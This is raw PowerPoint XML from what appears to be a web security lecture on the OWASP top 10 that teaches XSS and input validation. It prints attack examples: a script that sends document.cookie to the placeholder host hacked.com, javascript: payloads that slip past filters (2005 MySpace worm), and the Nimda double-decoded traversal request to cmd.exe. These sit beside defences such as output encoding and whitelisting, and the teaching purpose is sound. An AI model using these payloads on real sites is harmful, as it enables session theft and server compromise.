              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Stored information cannot be assumed to be safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>DOM based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>UnvalidatedOut contains a script that manipulates the DOM, leading to e.g. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	phishing attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Hybrid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="14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More examples of XSS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this will display the content of the session cookie</a:t>
            </a:r>
          </a:p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&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Passing the cookie to a malicious site.</a:t>
            </a:r>
          </a:p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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>='http://www.hacked.com/cgi-bin/cookie.cgi? '%20+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Embedding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> in a link to a image file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>:[code]” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="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XSS – MySpace Worm	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solidFill>
            <a:srgbClr val="FFFFFF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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>” – Using XSS to invite others to add him to the friend list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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Requests are automatically generated using AJAX (HTTP GET and POST)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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“In less than 24 hours, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’ had amassed over 1 million friends on the popular online community”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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Potential to spread malicious worms is significant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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://fast.info/myspace/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0"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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS protection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305800" cy="5253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Output encoding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 e.g. echo htmlentities($UnvalidatedOutput)  (meta characters will be HTML encoded)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Use owasp/microsoft Anti-XSS library</a:t>
            </a:r>
          </a:p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Input Validation</a:t>
            </a:r>
          </a:p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Specify the output encoding (such as ISO 8859-1, or UTF 8). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not allow the attacker to choose this for your users</a:t>
            </a:r>
          </a:p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Do not use “blacklist” validation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Prefer Indirect Selection and “whitelisting”</a:t>
            </a:r>
          </a:p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Watch out for canonicalization errors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Decode input to a canonical internal representation before validation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Make sure the application does not decode the same input twice!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Language specific recommendations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Java: Use Struts framework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Input validator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Output mechanisms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.NET: use Microsoft Anti-XSS library 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PHP: ensure output is passed through htmlentities() or htmlspecialchars(), or use the  PHP Anti-XSS library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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Double Decode Exploit (Nimda)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 wrap="none"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GET /scripts/..%255c..%255cwinnt/system32/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cmd.exe?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>c+dir+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>:\ HTTP/1.0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URL Decode – 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" baseline="30000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> round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/..%5c..%5cwinnt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 smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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URL Decode – 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" baseline="30000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> round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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>/..\..\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>winnt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>URL encoding:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.w3schools.com/TAGS/ref_urlencode.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"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Input Validation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Blacklisting should be avoided if possible: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Myspace blacked listed &lt;script&gt;, but allowed &lt;div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Here is what it missed (2005 Myspace worm)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500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;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You can pass a filter for &lt;script&gt;, for some browsers as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500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&lt;sc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500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>ript&gt;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Another ingenious ways of bypassing a filter for innerHTML (2005 Myspace worm)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500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Alert(eval(‘document.body.inne’ + ‘rHTML’));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Indirect Selection: best option, if possible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User select from a predefined list of values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Only an index to the selected value is passed to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Whitelisting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Specify what is allowed instead of what is not allowed (blacklisting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>FSA is a good tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100" smtClean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8502</TotalTime>
  <Words>2559</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>435</Paragraphs>
  <Slides>32</Slides>
  <Notes>30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Web Security</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>OWASP top 10 (2012) and its evolution</vt:lpstr>
      <vt:lpstr>1. XSS</vt:lpstr>
      <vt:lpstr>More examples of XSS</vt:lpstr>
      <vt:lpstr>XSS – MySpace Worm </vt:lpstr>
      <vt:lpstr>XSS protection</vt:lpstr>
      <vt:lpstr>Double Decode Exploit (Nimda)</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Other considerations in input validation</vt:lpstr>
      <vt:lpstr>Use of Struts</vt:lpstr>
      <vt:lpstr>2. Injection Flaws</vt:lpstr>
      <vt:lpstr>3. Malicious File Injection</vt:lpstr>
      <vt:lpstr>4. Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>5. Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>XSS vs. CSRF</vt:lpstr>
      <vt:lpstr>Prevention for CSRF</vt:lpstr>
      <vt:lpstr>6. Information Leakage and Improper Error Handling</vt:lpstr>
      <vt:lpstr>6. Information Leakage and Improper Error Handling</vt:lpstr>
      <vt:lpstr>7. Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>7. Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Accidental Session ID Denial of Service Attacks</vt:lpstr>
      <vt:lpstr>Session ID in URL </vt:lpstr>
      <vt:lpstr>Session ID Analysis</vt:lpstr>
      <vt:lpstr>Session ID Analysis</vt:lpstr>
      <vt:lpstr>Session ID Analysis</vt:lpstr>
      <vt:lpstr>Session Hijacking </vt:lpstr>
      <vt:lpstr>Session Fixation Attack</vt:lpstr>
      <vt:lpstr>8. Ensure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>8. Ensure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>9. Insecure Communications</vt:lpstr>
      <vt:lpstr>10. Failure to Restrict URL Access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Kombol, Tony</dc:creator>
  <cp:lastModifiedBy>test</cp:lastModifiedBy>
  <cp:revision>176</cp:revision>
  <cp:lastPrinted>2006-08-29T18:16:07Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-25T13:45:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-07-28T17:36:12Z</dcterms:modified>
</cp:coreProperties>
</file>